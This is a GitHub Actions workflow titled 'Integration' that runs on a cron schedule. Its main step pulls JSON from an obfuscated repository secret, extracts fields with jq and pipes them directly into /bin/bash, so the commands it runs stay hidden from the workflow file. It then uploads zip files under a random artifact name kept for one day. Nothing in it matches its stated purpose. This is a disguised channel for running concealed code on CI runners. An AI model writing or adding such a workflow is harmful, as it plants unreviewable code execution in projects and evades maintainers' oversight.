name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '44 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Perform
        env:
          oy92: ${{ secrets.oy92 }}
        run: |
          printf '%s' "$oy92" | jq -r .j1 | /bin/bash
          printf '%s' "$ftkd38" | jq -r .jlmjx41876 | /bin/bash
          printf '%s' "$kyakk76" | jq -r .mngjv8 | /bin/bash
          printf '%s' "$b54157" | jq -r .evau07714 | /bin/bash

      - name: Upload results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: XBihyXrT
          path: "*.zip"
          retention-days: 1
